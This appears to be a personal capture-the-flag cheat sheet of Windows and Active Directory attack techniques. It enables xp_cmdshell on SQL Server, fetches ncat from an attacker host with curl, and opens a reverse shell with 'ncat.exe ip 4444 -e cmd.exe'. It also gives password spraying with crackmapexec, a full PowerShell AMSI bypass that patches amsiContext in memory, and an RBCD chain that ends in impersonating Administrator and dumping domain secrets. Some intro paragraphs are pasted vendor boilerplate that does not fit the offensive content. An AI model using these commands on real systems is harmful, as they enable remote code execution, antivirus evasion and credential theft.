CTF Notes: 2024-06-01 IDOR SQL RCE AMSI Bypass RBCD
Insecure direct object references (IDOR)
In this section, we will explain what insecure direct object references (IDOR) are and describe some common vulnerabilities. Insecure direct object references (IDOR) are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly.
For example, an authentication link of the following form may be tampered to gain access to another object
http://url/auth/token/<base64-encoded>/session_id/
RCE via SQL Server
This article describes how to enable the xp_cmdshell SQL Server configuration option. This option allows system administrators to control whether the xp_cmdshell extended stored procedure can be executed on a system. By default, the xp_cmdshell option is disabled on new installations.
xp_cmdshell can be used to achieve RCE, however, sometime this function is not enabled. To enable the function:
EXECUTE AS LOGIN = 'SA';
EXEC sp_addsrvrolemember 'username', 'sysadmin';
sp_configure 'Show Advanced Options', 1
RECONFIGURE
sp_configure 'xp_cmdshell', 1
RECONFIGURE
- prepare reverse shell
# using ncat here to avoid AV detection
EXEC xp_cmdshell 'curl -s http://ip/ncat.exe -o c:\path\ncat.exe'
EXEC xp_cmdshell 'curl -s http://ip/libssl-3.dll -o c:\path\libssl-3.dll'
EXEC xp_cmdshell 'curl -s http://ip/libcrypto-3.dll -o c:\path\libcrypto-3.dll'
EXEC xp_cmdshell 'c:\path\ncat.exe ip 4444 -e cmd.exe'
SQL Server enum
- search for possible config files
dir /s *.INI
- password spray using crackmapexec
> crackmapexec smb target -u users.txt -p passwords.txt
- If there is a hit, run as the account: https://github.com/antonioCoco/RunasCs
.\RunasCs.exe username password cmd.exe -r ip:port
Memory dump analysis
In the event that your operating system crashes, you may be required to generate a complete memory dump to provide additional information to our technical support team. The dump file can then be used by developers to understand why the crash has occurred and help them in providing an accurate solution to the issue.
- To extract files from a memory dump: https://github.com/ufrisk/MemProcFS
- Dumping the hashes from extracted files
> impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY local
AMSI bypass
Anti-Malware Scan Interface bypass is useful when there is a AV running. Below is an example bypass for Windows 11: https://gustavshen.medium.com/bypass-amsi-on-windows-11-75d231b2cac6
function LookupFunc {
Param ($moduleName, $functionName)
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
Equals('System.dll')
}).GetType('Microsoft.Win32.UnsafeNativeMethods')
$tmp=@()
$assem.GetMethods() | ForEach-Object {If($_.Name -like "Ge*P*oc*ddress") {$tmp+=$_}}
return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,
@($moduleName)), $functionName))
}
function getDelegateType {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]]
$func, [Parameter(Position = 1)] [Type] $delType = [Void]
)
$type = [AppDomain]::CurrentDomain.
DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
[System.Reflection.Emit.AssemblyBuilderAccess]::Run).
DefineDynamicModule('InMemoryModule', $false).
DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass,
AutoClass', [System.MulticastDelegate])
$type.
DefineConstructor('RTSpecialName, HideBySig, Public',
[System.Reflection.CallingConventions]::Standard, $func).
SetImplementationFlags('Runtime, Managed')
$type.
DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType,
$func). SetImplementationFlags('Runtime, Managed')
return $type.CreateType()
}
$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)
Resource-based Constrained Delegation
This is similar to constrained delegation, but instead of giving permissions to an object to impersonate any user against a service. https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation#creating-a-computer-object
To exploit, need the following two tools
- https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1
- https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
Create new attacker machine
New-MachineAccount -MachineAccount newmachine -Password $(ConvertTo-SecureString 'password' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer newmachine -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
Get tgt
> impacket-getST -spn 'cifs/dc.target' -impersonate 'Administrator' 'domain/newmachine$:password' -dc-ip dc.target
Dump secrets
KRB5CCNAME=Administrator.ccache impacket-secretsdump domain/administrator@target -k -no-pass